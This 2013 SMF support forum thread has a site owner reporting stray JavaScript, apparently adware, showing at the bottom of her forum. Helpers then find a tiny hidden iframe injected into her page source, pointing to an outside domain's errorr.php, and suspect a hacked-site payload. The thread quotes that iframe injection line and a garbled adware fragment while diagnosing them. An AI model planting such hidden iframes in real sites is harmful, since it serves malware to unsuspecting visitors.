Advertisement:

Author Topic: Help! I have some random code on my forum...  (Read 8884 times)

Offline Divine27

  • Semi-Newbie
  • *
  • Posts: 20
Help! I have some random code on my forum...
« on: October 15, 2013, 07:00:08 PM »
I have this code on the bottom of my forum, it popped up sometime today when I wasn't online cause it wasn't there yesterday. What does all this mean and how do I fix it? :/

Code: [Select]
")}if(t=="NX"){i="G";for(var n=0;n=0){i=slider_keywords.slidertext[n].FAVICONSRC}}}l(t,e.ads[0].title,e.ads[0].description,displayURL,clickURL,i)}else if(t=="NX"&&r!=undefined&&r=="Y"){c()}}})}function b(){var e="Your input '"+OriginalDomain+"' has been corrected to '"+CorrectedDomain+"'";var t="";var n=e.length>63?63:e.length;for(i=0;i0){$jOld.cookie("sendori_coupon",1,{expires:expirationDate,path:"/",domain:cookieDomain});var couponDisplay=1}else{var couponDisplay=1}}else{couponCount=parseInt($jOld.cookie("sendori_coupon"));if(couponCount0){createCookie("sendori_coupon",1,couponCookieExpire);var couponDisplay=1}else{var couponDisplay=1}}else{couponCount=parseInt(readCookie("sendori_coupon"));if(couponCount

Offline Burke ♞ Knight

  • SMF Hero
  • ******
  • Posts: 3,534
Re: Help! I have some random code on my forum...
« Reply #1 on: October 15, 2013, 07:02:21 PM »
Have any mods been installed lately?
A link to the site would be useful.


Are you using the latest version of SMF?
Are you using a custom theme?
Any errors in the error logs? Apache, PHP, SMF?
 

Offline Divine27

  • Semi-Newbie
  • *
  • Posts: 20
Re: Help! I have some random code on my forum...
« Reply #2 on: October 15, 2013, 07:13:15 PM »
My forum is 2.0.5
I am using a custom theme from dzinerstudio, but it's been its been working fine since I got it.
Link is here: http://divinecandice.com/forum [nofollow]
And the only mod I did install was peoplesign or whatever, but uninstalled it when I got online, because the question verification seems to be working to keep the spam accounts away. And the error was already there when I did the uninstall, cause that's what I thought it was as first too, a broken mod of somesort.

Offline Burke ♞ Knight

  • SMF Hero
  • ******
  • Posts: 3,534
Re: Help! I have some random code on my forum...
« Reply #3 on: October 15, 2013, 07:18:26 PM »
I'm not seeing what you posted, but I do say that the text on your site is very difficult to read, the way the colors are.

Also, there does appear to be something at the bottom, that does not show much, except a little something at the very left.
I am unable to detect what it is, or how it fits in.

Offline Divine27

  • Semi-Newbie
  • *
  • Posts: 20
Re: Help! I have some random code on my forum...
« Reply #4 on: October 15, 2013, 07:25:40 PM »
ok, thank you very much. :)

Offline anir

  • Semi-Newbie
  • *
  • Posts: 20
Re: Help! I have some random code on my forum...
« Reply #5 on: October 15, 2013, 09:14:53 PM »


You have probably added this ?> somewhere near the bottom in some html code which lead to your code display.
SMF is the best forum I have ever used, efficient support system has always helped me and the very nice documentation too!

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 58,062
  • Gender: Male
    • Kindred-999 on GitHub
Re: Help! I have some random code on my forum...
« Reply #6 on: October 15, 2013, 09:53:25 PM »
Given the contents of the code, it looks like a badly added advert code..
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline Divine27

  • Semi-Newbie
  • *
  • Posts: 20
Re: Help! I have some random code on my forum...
« Reply #7 on: October 15, 2013, 09:58:19 PM »
I haven't added anything to the code though. :/ I contact my host to see if they can check it out.

Offline busterone

  • SMF Hero
  • ******
  • Posts: 2,150
  • Gender: Male
  • Devil Dog
    • The Demon's Den
Re: Help! I have some random code on my forum...
« Reply #8 on: October 15, 2013, 10:39:32 PM »
I found this in your source code
Code: [Select]
<iframe src="hfbakhsh.com/logs/errorr.php" border="0" height="5" width="6"></body></html></iframe>That doesn't appear to be part of your domain and smells of something sinister. I haven't tried to access that file, because I am not going to get myself infected just in case. 

Offline margarett

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 19,761
  • Gender: Male
Re: Help! I have some random code on my forum...
« Reply #9 on: October 15, 2013, 11:22:20 PM »
According Godaddy's Whois:
Quote
Domain Name: HFBAKHSH.COM
Registrar URL: http://www.godaddy.com
Updated Date: 2013-07-16 10:05:14
Creation Date: 2013-07-16 10:05:14
Registrar Expiration Date: 2015-07-16 10:05:14
Registrar: GoDaddy.com, LLC
Domain Status: clientDeleteProhibited
Domain Status: clientRenewProhibited
Domain Status: clientTransferProhibited
Domain Status: clientUpdateProhibited
Registrant Name: Ed Safrini
Registrant Organization:
Registrant Street:
Registrant City:
Registrant State/Province: Ontario
Registrant Postal Code:
Registrant Country: Canada
So it can be anyone, basically :P
Se forem conduzir, não bebam. Se forem beber... CHAMEM-ME!!!! :D

Quote
Over 90% of all computer problems can be traced back to the interface between the keyboard and the chair

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 58,062
  • Gender: Male
    • Kindred-999 on GitHub
Re: Help! I have some random code on my forum...
« Reply #10 on: October 15, 2013, 11:27:44 PM »
googling it does indicate that some people have complained about a malicious injection...

Which indicates that there may be something bad about that....
(the domain itself appears to be about insulated panels...   but I am betting that they themselves were hacked, and that this errorr.php file is a payload.


You're going to need to check your files for other stray code.

index.php and index.template.php are the most common targets, but there could be stuff stuck in all over.

look for recent file edits.

and googling the original code snippet that you psted indicates that there appear to be a lot of sites which have this snippet displayed....  which suggests a real hack pointing to a badly formed page - this exposing the hack by accident.
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.